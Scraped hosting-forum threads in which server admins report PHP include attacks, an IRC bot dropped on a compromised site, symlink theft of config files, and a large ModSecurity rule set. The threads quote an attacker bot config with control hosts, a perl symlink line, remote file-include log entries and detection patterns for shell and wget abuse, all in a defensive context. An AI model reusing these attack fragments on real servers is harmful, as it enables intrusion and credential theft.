Recurring HTTP Exploit

Nov 20, 2008

I'm having a recurring issue where someone is getting a script into /tmp, taking down the webserver and setting up their stupid IRC bot on port 80. It's annoying because thus far I have not been able to track them down. As soon as it happens I'm combing through the logs trying to find out what PHP script (probably PHPBB or something like it from one of my customers) is letting them through but there is nothing in the logs. I've had this happen before but usually there's some trace in the logs like some ASCII encoded string. Right now I just have little to nothing to go on and it's quite annoying. I've combed all over the net but found next to nothing. RKHunter doesn't even know it exists.

View 11 Replies

Max_user_connections Recurring

Aug 7, 2007

I keep getting this error once in a while for my forum.

Quote:

SQL ERROR [ mysql4 ]

User xxxxx_xxxx has already more than 'max_user_connections' active connections [1203]

An sql error occurred while fetching this page. Please contact an administrator if this problem persists.

I've contact support team from my Hosting provider and they have help me to increase the value of max_user_connection to 50. I have made to understand by them that this problem can be resolved by using VPS or Dedicated server. As a newbie, I just want some assurance would the problem permanently resolve if I'm using VPS or Dedicated server? Which one should I use? VPS or dedicated server?

View 6 Replies View Related

Recurring Remote Desktop

May 7, 2008

I recently got a Windows VPS to run a few applications 24/7. I generally login to the VPS during the day, via Remote Desktop, to review these applications..

However, I frequently have issues. Sometimes, I forget to log out and I will be terminated with a "the remote computer terminated the connection" and then I won't be able to re-login to the VPS. Sometimes I click the X on the Remote Desktop and then when I try to re-connect, I get the same error. Once I got the error "the remote connection has timed out. please try re-connecting to the remote computer again "

And the worse part is that the Remote Desktop can't be restarted alone.. my host has to restart my Windows every time - so my applications go down.

Is it me or is the VPS not supposed to act like this? Why is Remote Desktop so touchy?

I was told by the host that I should always use the Log Off.. however, if I do then Windows says that it will close all my applications.. I don't get any option to Log Off without closing the apps.. so I have to end up using the X.

- Disk Space 10GB
- Bandwidth 800GB
- Dedicated RAM 256MB
- Shared Dual Quad Core XEON CPUs
- Windows 2003 Server

View 6 Replies View Related

Plesk 12.x / Linux :: Recurring Listing On CBL For Using Several Different EHLO / HELO Names

Jan 14, 2015

I've been plagued by CBL listing for quite some time now, on a linux server with Plesk 12.After months of a fierce fight against every possible malware on the about 120 various websites on this server, extensively monitoring clients emails, enabling restrictive policies and finally even hiring a private security firm to investigate the problems further, we were sure that not a single spam message was sent by our server in any way.

So we finally contacted CBL, exposed the issue and got this answer:The CBL attempts to detect compromised machines in a number of ways based upon the email that the CBL's mail servers receive.During this it tries distinguish whether the connections represent real mail servers by ensuring that each connection is claiming a plausible machine name for itself (via SMTP HELO), and not listing any IP that corresponds to a real mail server (or several mail servers if the IP address is a NAT firewall with multiple mail servers behind it). 54.194.XX.XXX was found to be using several different EHLO/HELO names during multiple connections on or about:

2015:01:09 ~16:30 UTC+/- 15 minutes (approximately 3 days, 21 hours, 14 minutes ago).

The names seen included: xxx1.xx, xxx2.xx, xxx3.xx, xxx4.xx, xx.xxx5.xx, veniceberg.com..Note that the above list may include one or more names that are not fully qualified DNS names (FQDNs). Host names (ie: Windows node names) without a dot are not FQDNs.

The final possibility is that 54.194.XX.XXX is not a NAT firewall, and is instead a single box with many domains provisioned on it, some that send email directly, setting the HELO as the sending domain. If this is the case, to prevent a relisting we strongly recommend setting the mail software on the box so that a single identifying name is used in outbound SMTP connections mail software on the box so that a single identifying name is used in outbound SMTP connections. As an alternate workaround, you can configure the mail software to relay its outbound email through an intermediate mail server. Even a co-resident mail server package (such as IIS on Windows) will do fine.

This pointed me to this Plesk Mail setting (not sure if this selection is the default). Now we are waiting a few days to see if changing to "Send from domain IP addresses" solves the issue. I think this is a kind of issue which deserves attention by Parallels to avoid other users go trough our fatiguing ordeals. If this setting is responsible for getting servers blacklisted, it should be highly discouraged.

View 3 Replies View Related

PHP/GIF Exploit

Jun 23, 2007

I read about a new exploit that imbeds PHP code in a GIF file:
[url]

How would that work exactly? Wouldn't a server have to be set up specifically to parse PHP code in gif files? Who would set up their server that way? Is there a way around that so you can remotely trick the server into parsing gif files as PHP code?

View 3 Replies View Related

New PHP Exploit

Sep 11, 2007

check this out [url]

That could do some damage, all someone would have to do is get shell on a site or be able to see config.php and then connect with that database and mass deface the server or put shells on other sites.

Anyone know of any way to prevent this?

View 14 Replies View Related

PHP Exploit

Nov 25, 2007

Just discovered a php exploit on a client's domain.

Found this in the access_log

[url]
=
[url]

Take a look at rmod.txt
[url]

then found this in a conf.txt in the /pearus/.bash folder

Quote:

statefile Infodll.state
connectionmethod direct
server animefox.no-ip.biz 6666
server animefox.no-ip.biz 6667
server animefox.no-ip.biz 6668
server animefox.no-ip.biz 6669
server animefox.no-ip.biz 7000
server animefox2.no-ip.biz 6666
server animefox2.no-ip.biz 6667
server animefox2.no-ip.biz 6668
server animefox2.no-ip.biz 6669
server animefox2.no-ip.biz 7000
server animefox.no-ip.biz 6666
server animefox.no-ip.biz 6667
server animefox.no-ip.biz 6668
server animefox.no-ip.biz 6669
server animefox.no-ip.biz 7000
server animefox2.no-ip.biz 32000
server animefox2.no-ip.biz 40000
server animefox2.no-ip.biz 42000
server animefox2.no-ip.biz 44000
server animefox2.no-ip.biz 48000
channel ###Snake###
channel #PoIsOn_MuSiC
adminpass f2oL8zmnIG/CA
user_nick PoIsOn|MuSiC|030
#local_vhost 123.456.789.123
#tcprangestart 4000
#usenatip 123.456.789.123
user_realname ...::::9PoIsOn CrEw::::...
user_modes +ix
loginname r0x
slotsmax 10
queuesize 30
maxtransfersperperson 1
maxqueueditemsperperson 2
restrictlist yes
restrictprivlist no
restrictsend yes
restrictprivlistmsg Per la lista [url]
respondtochannelxdcc no
respondtochannellist no
headline 9,2 ..::4T11h0e 13B9e11S7t 4C11h9a8n7n8e7L 11O4f 11T7h4e 8W13o8r9l7D11::..
creditline 9,2 ..::4T11h0e 13B9e11S7t 4C11h9a8n7n8e7L 11O4f 11T7h4e 8W13o8r9l7D11::..
adminhost *!*@PoIsOn.CrEw
adminhost SilverFox!*@*.*
uploadhost *!*@PoIsOn.CrEw
uploadhost *!*@P.o.I.s.O.n
downloadhost *!*@*.*
hideos yes
filedir /home/httpd/vhosts/domain.com/httpdocs/pearus/.bash
uploaddir /home/httpd/vhosts/domain.com/httpdocs/pearus/.bash
#

contents of the .bash folder:

Quote:

-rw-r--r-- 1 apache apache 1729 Nov 23 11:44 conf.txt
-rwxr-xr-x 1 apache apache 214350 Nov 5 06:01 httpd
-rwxr-xr-x 1 apache apache 214382 Nov 5 06:01 httpd_chroot
-rw-r--r-- 1 apache apache 268 Nov 25 13:25 Infodll.state
-rw-r--r-- 1 apache apache 268 Nov 25 13:23 Infodll.state~
-rw-r--r-- 1 apache apache 268 Nov 19 06:12 mybot.state
-rw-r--r-- 1 apache apache 268 Nov 19 06:09 mybot.state~
-rw-r--r-- 1 apache apache 604160 Sep 23 09:07 Poi.tar
-rwxrwxrwx 1 apache apache 41 Nov 25 10:52 restart

Still trying to dig in some more to figure out how they were able to exploit
here's the first few lines of their blog.php

Quote:

<?php
session_cache_limiter('none');
session_start();
ob_start();
?>
<?php include_once("oneadmin/config.php");
include_once($path["docroot"]."common/session.php"); ?>

View 9 Replies View Related

Is This A New Exploit

Nov 29, 2007

several of our dedicated servers got hacked,(NOT rooted), but many of sites on each server got hacked.

after tracing the hacking process, we found that the hacker only put a "perl" file contain:

++++++++++cut here+++++++++
symlink("/link/to/victim/configs","/link/to/local/hacker/site");

+++++++++++cut here++++++++++++

and then we found many links of victim config files on the local hacker site!

all servers runing with:

-php 4.4.7
-centos 4.5
-cpanel

i tried to do the same way by a normal user, but i get the "Permission denied" error and i can not read the linked files!

so how can i prevent the function "symlink" from executing using perl?

is there any new exploit in php/perl?

View 8 Replies View Related

PHP Exploit

Nov 24, 2007

My provider sent me an abuse ticket with the message below. This is a cPanel server with 300 domains. How do I go about tracking down the problem? They can�t give me anymore information and I don�t know where else to look.

This ticket was automatically generated by the XXXXXXXXXXXXXX Network Protection System. An unusual amount of traffic has been detected involving your IP address xx.xx.xx.xx.

Details of the event follow:

3885: HTTP: PHP File Include Exploit

This filter detects an attempt to post the contents of an external script to a PHP application. This behavior is typical of a PHP file include vulnerability attack. This attack could allow an attacker to insert custom code into a variable that would be executed by all users of the vulnerable application.

View 6 Replies View Related

EXploit Scanner (cxs)

Nov 6, 2009

CSF install the new version, I warned that the option Check for cxs. I had a few questions!

1 - is it free? And can be installed and will work?

2 - I like these things are additional to the installation?

3 - a bit about this new possibility to explain how to solve the case to get out of the red.

View 14 Replies View Related

Kernel Exploit

Jun 28, 2008

How Can i translate An Kernel Exploit to secure my server like that

[url]

how can i now what i do to my server if i see any exploit

View 4 Replies View Related

TikiWiki Exploit

Jan 2, 2008

Has anyone has to deal with a recent exploit of TikiWiki (comes as one of the available Fantastico scripts)? I found my server had been compromised quite by accident. I was Googleing my domain just to see what came up and found a bunch of pages with links to Porn sites that were in some sub directories in my TikiWiki install. This article discusses:

[url]

Just wondering if anyone here has had to deal with this and if there in anything else I should do that is not discussed in thie article?

View 0 Replies View Related

What To Do About These Exploit Attempts

Jun 10, 2008

have found open servers and are trying to execute:

Site: MYSite (mydomain.com)
Error Code: 404 Missing URL ()
Occurred: Tue Jun 10 17:57:20 MDT 2008
Requested URL: //mypanel/clientarea.php?action=[url]
User Address: 67.15.183.164
User Agent: libwww-perl/5.805
Referer:

"Alartist" seems to be an Arabic site while the IP seems to be hosted by the Planet.

Anyone else seeing these?

View 5 Replies View Related

PHP Mail() Exploit

Feb 14, 2007

I have been having trouble with my server lately sending out a lot of emails and I thought I had tracked it down to people taking advantage of some mailing lists which I took care of.

What I ran into today is I have a business where I send out emails using a php script in our shopping cart. Well I got a lot of failure emails back that caught my attention. They have about 200 random email listings that are not in my database saying why they can't be delivered and then a copy of the actual newsletter that I just sent today.

So is it possible that some where something is injecting this BCC field into the php mail()? If so, is there something that I can do to find this script?

Box is set to poplock 20min, smtp auth on, firewall has been up for years, chkrootkit is clean.

View 11 Replies View Related

Cpanel Exploit

Mar 30, 2007

I've been checking my logs and I'm seeing a TON of referers like...

Quote:

Originally Posted by Logs

[url]

Is this some kind of new Cpanel exploit?

View 7 Replies View Related

Possible R0nin Exploit

May 6, 2007

I think i have a security problem about my server. I have centos4.4 2gb ram of server. Plesk 8.1 control panel

It is a dedicated server. Http crashed and when i want to restart apache it give address already in use error. Then while i was googling for solution for this, i found a solution and check which service is using that port and i saw r0nin there

I dont know if it is an exploit or how it infected and how to solve. I attached a screenshot below.

I will be glad if you can give me some more information about it. Also i am using apf as firewall on my server

View 14 Replies View Related

Bind Exploit Rumor

May 13, 2008

There has been some hacker group out there on the net hacking lots of servers. Some of which I knew the admins/owners and they were not stupid people and kept their server up to date as well as using grsecurity kernels, selinux, assorted firewalls, etc. In other words they done what most of us do trying to keep their server as secure as possible.

But it done them no good as the hackers were able to get root access in minutes on linux and freebsd servers. After looking into it and asking around supposedly these hackers have a 0day remote root exploit for bind.

Anyone heard of this and does it seem plausible?

The bind that comes with cpanel and directadmin is BIND 9.3.3rc2 which is pretty old even compared to default rhel packages which are 9.42 now. Does anyone know why cpanel and da have bind excluded form being updated in yum? And what would be the harm in upgrading? Has anyone here upgraded their bind?

View 14 Replies View Related

Exploit.HTML.IESlice.bz

Jan 14, 2008

Has anyone encountered server being infected with Exploit.HTML.IESlice.bz
My server is infected with this new rootkit. Is the 'OS reload' only the solution?

View 9 Replies View Related

Counter PHP Exploit Techniques

Feb 1, 2008

Lately, our server logs are being filled with requests from exploited servers. In order to prevent our servers from being hacked, I have tried to harden the server as much as possible. (Server: Centos 4.6, Apache 2, PHP 5, MySql 5, Cpanel/WHM)

I have detailed my efforts and would appreciate some feed back or suggestions of your own that have been effective.

-------------

Examples include c99.txt exploits, php insertions, etc.

Recent Sample Logs:

Code:
66.246.246.38 - - [30/Jan/2008:16:32:59 -0500] "GET /example.cgi?SearchIndex=http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fmaj%2Fpepus%2F&Manufacturer=Black+&+Decker HTTP/1.0" 406 442 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

Code:
64.38.19.90 - - [25/Jan/2008:04:35:22 -0500] "GET /post/index/7//bm/mail.php?id=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 406 464 "-" "libwww-perl/5.808"

Code:
207.44.154.126 - - [01/Feb/2008:01:36:12 -0500] "GET /index.php?act=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&id=2 HTTP/1.0" 200 139303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
What to do to prevent these intrusions?

1) I have updated my Mod_Security rules (running version modsec2) to include checks for the following:

Code:
# Check Content-Length and reject all non numeric ones
SecRule REQUEST_HEADERS:Content-Length "!^d+$" "deny,log,auditlog,msg:'Content-Length HTTP header is not numeric', severity:'2',id:'960016'"

# Do not accept GET or HEAD requests with bodies
SecRule REQUEST_METHOD "^(GET|HEAD)$" "chain,deny,log,auditlog,msg:'GET or HEAD requests with bodies', severity:'2',id:'960011'"
SecRule REQUEST_HEADERS:Content-Length "!^0?$"

# Require Content-Length to be provided with every POST request.
SecRule REQUEST_METHOD "^POST$" "chain,deny,log,auditlog,msg:'POST request must have a Content-Length header',id:'960012',severity:'4'"
SecRule &REQUEST_HEADERS:Content-Length "@eq 0"

# Don't accept transfer encodings we know we don't know how to handle
SecRule HTTP_Transfer-Encoding "!^$" "deny,log,auditlog,msg:'ModSecurity does not support transfer encodings',id:'960013',severity:'5'"

# Check decodings
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|
REQUEST_HEADERS:Referer "@validateUrlEncoding"
"chain, deny,log,auditlog,msg:'URL Encoding Abuse Attack Attempt',id:'950107',severity:'4'"
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\%(?![0-9a-fA-F]{2}|u[0-9a-fA-F]{4})"

# Proxy access attempt
SecRule REQUEST_URI ^http:/ "deny,log,auditlog,msg:'Proxy access attempt', severity:'2',id:'960014'"

#
# Restrict type of characters sent
SecRule REQUEST_FILENAME|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer
"@validateByteRange 1-255"
"log,auditlog,msg:'Request Missing an Accept Header', severity:'2',id:'960015',t:urlDecodeUni,phase:1"

SecRule ARGS|ARGS_NAMES "@validateByteRange 1-255"
"deny,log,auditlog,msg:'Invalid character in request',id:'960901',severity:'4',t:urlDecodeUni,phase:2"

# allow request methods
SecRule REQUEST_METHOD "!^((?:(?:POS|GE)T|OPTIONS|HEAD))$"
"phase:1,log,auditlog,msg:'Method is not allowed by policy', severity:'2',id:'960032'"

# Restrict file extension
# removed exe so that frontpage will work

# Restricted HTTP headers
SecRule REQUEST_HEADERS_NAMES ".(?:Lock-Token|Translate|If)$"
"deny,log,auditlog,msg:'HTTP header is restricted by policy',id:'960038',severity:'4'"

SecRule HTTP_User-Agent "(?:(?:m(?:ozilla/4.0 (compatible)|etis)|webtrends security analyzer|pmafind)|n(?:-stealth|sauditor|essus|ikto)|b(?:lack ?widow|rutus|ilbo)|(?:jaascoi|paro)s|internet explorer|webinspect|.nasl)"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990002',severity:'2'"
SecRule REQUEST_HEADERS_NAMES "acunetix-product"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990901',severity:'2'"
SecRule REQUEST_FILENAME "^/nessustest"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990902',severity:'2'"

SecRule REQUEST_HEADERS:User-Agent "(?:m(?:ozilla/(?:4.0 (compatible; advanced email extractor|2.0 (compatible; newt activex; win32))|ailto:craftbot@yahoo.com)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|siphon|wolf)|(?:collecto|irgrabbe)r|xtractorpro|o browse)|a(?:t(?:tache|hens)|utoemailspider|dsarobot)|w(?:eb(?:emailextrac| by mail)|3mir)|f(?:astlwspider|loodgate)|p(?:cbrowser|ackrat|surf)|(?:digout4uagen|takeou)t|(?:chinacla|be)w|hhjhj@yahoo|rsync|shai|zeus)"
"deny,log,auditlog,msg:'Rogue web site crawler',id:'990012',severity:'2'"

SecRule REQUEST_HEADERS:User-Agent "(?:(?:(?:indy librar|snoop)y|microsoft url control|lynx)|d(?:ownload demon|isco)|w(?:3mirror|get)|l(?:ibwww|wp)|p(?:avuk|erl)|cu(?:sto|rl)|big brother|autohttp|netants|eCatch)"
"chain,log,auditlog,msg:'Request Indicates an automated program explored the site',id:'990011',severity:'5'"
SecRule REQUEST_HEADERS:User-Agent "!^apache.*perl"

# Session fixation
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:.cookie.*?;W*?(?:expires|domain)W*?=|http-equivW+set-cookie)"
"capture,ctl:auditLogParts=+E,log,auditlog,msg:'Session Fixation. Matched signature <%{TX.0}>',id:'950009',severity:'2'"

# Blind SQL injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:(?:s(?:ys.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect.{0,40}(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql.user)|c(?:onstraint_type|harindex)|attnotnull)|(?:locate|instr)W+()|@@spid)"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|(?:dba|mb)_users|xtypeW+char|rownum)|t(?:able_name|extposW+())"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950904',severity:'2'"

# SQL injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:(?:s(?:elect(?:.{1,100}?(?:(?:length|count|top).{1,100}?from|from.{1,100}?where)|.*?(?:d(?:ump.*from|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebtask)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|e(?:xecresultset|numdsn)|(?:terminat|dirtre)e|availablemedia|loginconfig|cmdshell|filelist|makecab|ntsec)|u(?:nion.{1,100}?select|tl_(?:file|http))|group.*by.{1,100}?having|loadW*?data.*infile|(?:n?varcha|tbcreato)r|autonomous_transaction|open(?:rowset|query)|dbms_java)|i(?:n(?:toW*?(?:dump|out)file|sertW*?into|nerW*?join)|(?:f(?:W*?(W*?benchmark|null)|snull)W*?()|(?:having|or|and)s+?(?:d{1,10}|'[^=]{1,10}')s*?[=<>]+|(?:print]W*?@|root)@|c(?:astW*?(|oalesce))|(?:;W*?(?:shutdown|drop)|@@version)|'(?:s(?:qloledb|a)|msdasql|dbo)')"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950001',severity:'2'"
SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:user_(?:(?:object|table|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|substr(?:ing)?|table_name|mb_users|rownum)"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950906',severity:'2'"

# XSS
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)W*?=|abort)|(?:l(?:owsrcW*?(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)W*?(?:(?:java|vb)script|shell)|background-image|mocha):|typeW*?(?:text(?:W*?(?:j(?:ava)?|ecma)script| [vbscript])|applicationW*?x-(?:java|vb)script)|s(?:(?:tyleW*=.*expressionW*|ettimeoutW*?)(|rcW*?(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)|a(?:ctivexobject|lertW*?())|<(?:(?:body.*?(?:backgroun|onloa)d|input.*?typeW*?image)|![CDATA[|script|meta)|(?:.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|@import))"
"capture,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack. Matched signature <%{TX.0}>',id:'950004',severity:'2'"

# file injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:.(?:ht(?:access|passwd|group)|www_?acl)|global.asa|httpd.conf|boot.ini)|/etc/)"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Remote File Access Attempt. Matched signature <%{TX.0}>',id:'950005',severity:'2'"

# Command access
SecRule REQUEST_FILENAME "(?:n(?:map|et|c)|w(?:guest|sh)|cmd(?:32)?|telnet|rcmd|ftp).exe"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Access. Matched signature <%{TX.0}>',id:'950002',severity:'2'"

# Command injection
SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:(?:n(?:et(?:W+?localgroup|.exe)|(?:map|c).exe)|t(?:racer(?:oute|t)|elnet.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp).exe|echoW*?y+)|c(?:md(?:(?:32)?.exe|W*?/c)|d(?:W*?[/]|W*?..)|hmod.{0,40}?+.{0,3}x))|[;|`]W*?(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)|g(?:++|cc))|/(?:c(?:h(?:grp|mod|own|sh)|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|g(?:++|cc)|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)(?:['"|;`-s]|$))"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950006',severity:'2'"
SecRule "ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent"
"wget"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950907',severity:'2'"

# SSI injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "<!--W*?#W*?(?:e(?:cho|xec)|printenv|include|cmd)"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'SSI injection Attack. Matched signature <%{TX.0}>',id:'950011',severity:'2'"

# PHP injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open)|$_(?:(?:pos|ge)t|session))|<?(?!xml))"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'PHP Injection Attack. Matched signature <%{TX.0}>',id:'950013',severity:'2'"

#suntzu
SecRule REQUEST_URI|REQUEST_BODY|HTTP_Content-Disposition "/(suntzu.*|suntzu).php?cmd="

#Known rootkits
SecRule REQUEST_URI|REQUEST_BODY "perl (xpl.pl|kut|viewde|httpd.txt)"
SecRule REQUEST_URI|REQUEST_BODY "./xkernel;"
SecRule REQUEST_URI|REQUEST_BODY "/kaiten.c"
SecRule REQUEST_URI|REQUEST_BODY "/mampus?&(cmd|command)"

# WEB-MISC .htpasswd access
SecRule REQUEST_URI ".htpasswd"

# WEB-MISC /etc/passwd access
SecRule REQUEST_URI "/etc/passwd"

#Exploit agent
SecRule HTTP_User-Agent "Mosiac 1.*"

#remote bash shell
SecRule REQUEST_URI "/shell.php&cmd="
SecRule ARGS "/shell.php&cmd="

# WEB-CGI formmail
SecRule REQUEST_URI "/(formmail|mailform)(x0a|.plx0a)"

#Invision Board ipchat.php file include
SecRule REQUEST_URI "/hk/ipchat.php*root_path*conf_global.php"

#Invision Power Board SQL injection
SecRule REQUEST_URI "/hk/index.php?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=*(UNION|SELECT|DELETE|INSERT)"

#Invision Gallery SQL Injection Vulnerabilities
SecRule REQUEST_URI "/hk/index.php" chain
SecRule ARGS:comment "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|*| ]+[[:space:]](from|into|table|database|index|view)"

# TIKIWIKI
SecRule REQUEST_URI "/tiki-map.phtml?mapfile=../../"

#Wordpress shell injection Vulnerability
SecRule REQUEST_URI "/cache/user.*/.*.php?cmd=" "id:390064,rev:1,severity:2,msg:'JITP: Wordpress shell injection Vulnerability'"

#Bad agent
SecRule HTTP_User-Agent "Brutus/AET"

#Web leaches
SecRule HTTP_User-Agent "Linux"
SecRule HTTP_User-Agent "libcurl-agent"
SecRule HTTP_User-Agent "TurnitinBot"
SecRule HTTP_User-Agent "ANONYMOUS"
SecRule HTTP_User-Agent "LinkWalker"
SecRule HTTP_User-Agent "Drecombot"
SecRule HTTP_User-Agent "Mac Finder"
SecRule HTTP_User-Agent "ConveraCrawler"
SecRule HTTP_User-Agent "WebarooBot"
SecRule HTTP_User-Agent "RufusBot"
SecRule HTTP_User-Agent "SumeetBot"
SecRule HTTP_User-Agent "pulseBot"
SecRule HTTP_User-Agent "FyberSpider"
SecRule HTTP_User-Agent "1-More Scanner v1.25"
SecRule HTTP_User-Agent "DRT-ResolveBot-Ignore"
SecRule HTTP_User-Agent "T-H-U-N-D-E-R-S-T-O-N-E"
SecRule HTTP_User-Agent "SnapPreviewBot"
SecRule HTTP_User-Agent "IRLbot"
SecRule HTTP_User-Agent "Charlotte"
SecRule HTTP_User-Agent "ninetowns"
SecRule HTTP_User-Agent "heritrix"
SecRule HTTP_User-Agent "Python-urllib"
SecRule HTTP_User-Agent "InetURL"
SecRule HTTP_User-Agent "cazoodle"
SecRule HTTP_User-Agent "DepSpid" "deny,nolog,status:410"
SecRule HTTP_User-Agent "Browsezilla"
SecRule HTTP_User-Agent "MetagerBot"
SecRule HTTP_User-Agent "TALWinHttpClient"
SecRule HTTP_User-Agent "Snapbot"
SecRule HTTP_User-Agent "BDFetch"
SecRule HTTP_User-Agent "WebaltBot"
SecRule HTTP_User-Agent "VSynCrawler"
SecRule HTTP_User-Agent "UbiCrawler"
SecRule HTTP_User-Agent "WebCapture"
SecRule HTTP_User-Agent "WebCopier"
SecRule HTTP_User-Agent "FairAd Client"
SecRule HTTP_User-Agent "Black Hole"
SecRule HTTP_User-Agent "Crescent"
SecRule HTTP_User-Agent "MIIxpc"
SecRule HTTP_User-Agent "Harvest"
SecRule HTTP_User-Agent "LinkextractorPro"
SecRule HTTP_User-Agent "Snoopy"
SecRule HTTP_User-Agent "IDBot"
SecRule HTTP_User-Agent "Cyveillance" "deny,nolog,status:404"
SecRule HTTP_User-Agent "PEAR HTTP_Request class"
SecRule HTTP_User-Agent "libwww-perl"

11) Review my logs daily to look for problem child scrapers, hackers, and issues.

View 8 Replies View Related

Open BSD Remote Exploit

Mar 15, 2007

posted today in slashdot, after over 10 years no remote exploit, ...

[url]

View 1 Replies View Related

How To Prevent Shell Hacking Like C.100 / R57 Exploit?

Apr 23, 2009

one of my client account has just been hacked with c.100 exploit. This method injects 1 php file that acts like fully featured file manager. This hacker use my client account to place multiple scam & phissing sites

now i'm wondering if this kind of exploit hacking have a way to counter them as my friend that there aren't any proved method untill now :-/

This is the php file i've recovered:
<<url removed>>

FYI, my server configuration:
- apache 2.2.11

- centos 5.2

- cpanel + whm 11.24.4

- suphp, clamav & modsec enabled

View 14 Replies View Related

AWStats Exploit Attempt Prevention

Jun 4, 2008

one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to

GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"

View 0 Replies View Related

Apache Mod_rewrite Security Exploit

Feb 11, 2007

One of my servers is running Apache 1.3.34 (Unix), and I recently noticed that there was a rather large mod_rewrite security exploit found:

[url]

I can't seem to figure out if this affects me with the version I am running? Can anyone help me out on this to determine if I need to upgrade or if I am already patched up?

View 9 Replies View Related

Linux Vmsplice Local Root Exploit (2.6.17 - 2.6.24.1)

Feb 10, 2008

Get ready for another round of patching and reboots. See:
[url]

